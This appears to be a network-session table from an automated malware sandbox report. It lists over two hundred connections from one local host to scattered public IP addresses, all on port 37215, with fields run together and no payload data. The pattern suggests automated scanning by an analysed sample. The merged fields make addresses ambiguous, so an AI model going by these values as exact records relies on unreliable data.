                                                  3709192.168.2.135080448.52.60.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3710192.168.2.1347618177.198.50.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3711192.168.2.1341284197.8.2.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3712192.168.2.134281441.187.198.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3713192.168.2.135878641.180.35.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3714192.168.2.1334924197.189.72.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3715192.168.2.134689241.181.212.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3716192.168.2.134960641.144.71.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3717192.168.2.1356492157.149.97.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3718192.168.2.135196641.23.215.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3719192.168.2.135395641.73.140.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3720192.168.2.134714241.203.143.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3721192.168.2.134158841.96.220.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3722192.168.2.135694841.60.179.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3723192.168.2.1348842157.118.115.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3724192.168.2.1359528157.2.248.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3725192.168.2.1354904157.164.198.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3726192.168.2.13602668.151.173.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3727192.168.2.134309441.120.104.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3728192.168.2.1336782157.69.140.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3729192.168.2.135425634.224.233.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3730192.168.2.1357088109.219.48.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3731192.168.2.1349670157.91.56.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3732192.168.2.1356884183.251.57.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3733192.168.2.133483841.106.41.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3734192.168.2.1344898157.62.41.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3735192.168.2.1336750153.49.104.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3736192.168.2.1354300197.57.26.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3737192.168.2.1349512197.62.145.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3738192.168.2.1353192197.53.229.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3739192.168.2.1340902157.157.55.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3740192.168.2.1348082213.248.99.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3741192.168.2.1350904157.37.252.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3742192.168.2.1356590157.193.36.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3743192.168.2.135301241.190.173.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3744192.168.2.1335844197.244.158.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3745192.168.2.1342242113.183.159.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3746192.168.2.1346664192.84.239.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3747192.168.2.134510672.26.155.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3748192.168.2.134445883.226.137.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3749192.168.2.1336650157.229.247.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3750192.168.2.1360584138.136.154.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3751192.168.2.1335776197.123.214.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3752192.168.2.134118437.63.4.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3753192.168.2.1358092157.66.13.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3754192.168.2.134186412.26.219.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3755192.168.2.1338694157.107.141.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3756192.168.2.136025874.228.236.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3757192.168.2.134661241.4.165.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3758192.168.2.1349332197.183.81.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3759192.168.2.134240441.226.160.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3760192.168.2.133517064.216.79.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3761192.168.2.1339542157.87.249.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3762192.168.2.1350322197.139.92.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3763192.168.2.1354594197.188.158.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3764192.168.2.1339156197.248.202.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3765192.168.2.134397641.83.244.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3766192.168.2.133848441.118.35.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3767192.168.2.1348084157.156.83.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3768192.168.2.1357546157.102.159.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3769192.168.2.135708862.124.140.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3770192.168.2.1345958156.250.85.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3771192.168.2.1344076148.93.181.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3772192.168.2.1335888197.34.253.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3773192.168.2.1360766157.186.40.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3774192.168.2.1347078197.45.220.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3775192.168.2.134928668.235.247.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3776192.168.2.134202417.44.170.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3777192.168.2.134154897.169.217.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3778192.168.2.1355042197.133.253.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3779192.168.2.133548040.222.182.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3780192.168.2.1353994197.133.228.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3781192.168.2.135620254.163.217.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3782192.168.2.1359462158.196.175.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3783192.168.2.1357980136.46.116.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3784192.168.2.1356534206.211.91.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3785192.168.2.134556041.119.216.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3786192.168.2.1346110157.23.75.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3787192.168.2.1343908197.21.83.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3788192.168.2.134914441.99.254.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3789192.168.2.133955841.181.188.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3790192.168.2.1335976157.68.145.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3791192.168.2.1340328197.12.210.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3792192.168.2.1349176197.126.132.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3793192.168.2.1355394157.74.49.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3794192.168.2.133300241.100.135.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3795192.168.2.1333672125.12.65.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3796192.168.2.1335104157.0.202.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3797192.168.2.1349256197.157.153.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3798192.168.2.1344958199.69.26.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3799192.168.2.1341570197.77.33.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3800192.168.2.1333580139.30.22.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3801192.168.2.1348620148.106.182.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3802192.168.2.1343916157.106.157.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3803192.168.2.1341266122.92.44.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3804192.168.2.135184462.40.157.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3805192.168.2.1339762197.204.3.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3806192.168.2.1338870197.78.152.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3807192.168.2.1348826197.180.161.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3808192.168.2.1358020148.50.247.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3809192.168.2.1341060197.18.76.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3810192.168.2.134140631.48.20.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3811192.168.2.1346440197.180.67.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3812192.168.2.1338820197.43.141.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3813192.168.2.1354612197.74.221.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3814192.168.2.134222441.59.183.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3815192.168.2.134245441.157.20.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3816192.168.2.134965649.161.84.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3817192.168.2.1353936213.120.87.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3818192.168.2.1354584118.208.34.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3819192.168.2.133360041.204.203.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3820192.168.2.1349702197.2.138.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3821192.168.2.1356258157.139.203.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3822192.168.2.1339108157.101.254.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3823192.168.2.1341560197.97.79.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3824192.168.2.134246041.78.88.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3825192.168.2.1360038157.153.191.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3826192.168.2.1348342157.12.102.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3827192.168.2.1349690157.145.250.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3828192.168.2.1348222197.179.8.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3829192.168.2.1354284197.2.9.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3830192.168.2.134475441.181.122.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3831192.168.2.1333402197.30.88.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3832192.168.2.1336054157.150.83.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3833192.168.2.1341132157.97.155.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3834192.168.2.1338374103.51.136.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3835192.168.2.1339076157.115.152.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3836192.168.2.1338178197.61.123.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3837192.168.2.1358048197.26.130.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3838192.168.2.135963841.253.99.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3839192.168.2.1348346157.195.145.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3840192.168.2.1337592197.30.4.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3841192.168.2.1358734210.30.182.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3842192.168.2.1332982197.53.255.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3843192.168.2.134882041.135.14.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3844192.168.2.1347718197.140.22.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3845192.168.2.133385272.93.96.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3846192.168.2.134846841.167.248.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3847192.168.2.1349758157.200.82.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3848192.168.2.1342900197.33.67.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3849192.168.2.1356730157.149.10.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3850192.168.2.1335418137.13.90.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3851192.168.2.1355906116.17.152.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3852192.168.2.1336470157.151.9.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3853192.168.2.134619812.250.167.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3854192.168.2.1339184219.254.84.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3855192.168.2.133647841.199.255.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3856192.168.2.135872041.12.63.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3857192.168.2.1347712157.65.236.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3858192.168.2.1353108197.220.142.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3859192.168.2.134677241.113.211.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3860192.168.2.1333946157.9.195.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3861192.168.2.1334922157.119.167.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3862192.168.2.134046641.103.150.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3863192.168.2.134443241.254.123.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3864192.168.2.1356160197.129.83.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3865192.168.2.1348580117.12.43.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3866192.168.2.1359596197.75.210.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3867192.168.2.1336310197.251.12.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3868192.168.2.133373241.208.230.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3869192.168.2.1341504197.132.75.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3870192.168.2.134533841.95.68.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3871192.168.2.1350358197.74.38.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3872192.168.2.134191641.101.8.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3873192.168.2.1348590169.155.243.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3874192.168.2.1340638157.164.27.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3875192.168.2.1359060157.206.132.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3876192.168.2.1340028157.223.152.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3877192.168.2.1349166197.47.243.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3878192.168.2.1344368197.245.135.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3879192.168.2.1333670197.236.82.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3880192.168.2.133344641.174.246.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3881192.168.2.1348818197.16.44.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3882192.168.2.1352180197.199.87.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3883192.168.2.134053041.183.103.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3884192.168.2.133887041.26.249.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3885192.168.2.134705041.239.134.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3886192.168.2.1342550157.128.28.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3887192.168.2.134295836.196.217.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3888192.168.2.1358620197.244.237.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3889192.168.2.135368641.205.62.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3890192.168.2.135521841.121.193.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3891192.168.2.1352908197.204.91.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3892192.168.2.1348378197.181.118.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3893192.168.2.1346570157.110.122.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3894192.168.2.135378494.233.121.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3895192.168.2.134550641.84.61.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3896192.168.2.1342712157.246.54.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3897192.168.2.1358660157.117.184.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3898192.168.2.135503641.245.96.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3899192.168.2.1337324157.39.42.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3900192.168.2.1340892197.16.102.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3901192.168.2.1359046197.96.10.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3902192.168.2.134075841.118.103.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3903192.168.2.1334718157.142.4.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3904192.168.2.1340538197.57.49.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3905192.168.2.1351258197.95.120.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3906192.168.2.1356938197.43.29.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3907192.168.2.1337388197.73.22.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3908192.168.2.134369836.50.236.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3909192.168.2.1344262112.156.8.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3910192.168.2.135591874.6.123.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3911192.168.2.1334470187.85.56.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3912192.168.2.1341620200.169.3.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3913192.168.2.1358598157.86.141.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3914192.168.2.1357144203.250.44.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3915192.168.2.1348268197.5.217.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3916192.168.2.1334444157.169.13.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3917192.168.2.1357650157.53.201.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3918192.168.2.1335120157.180.192.22037215
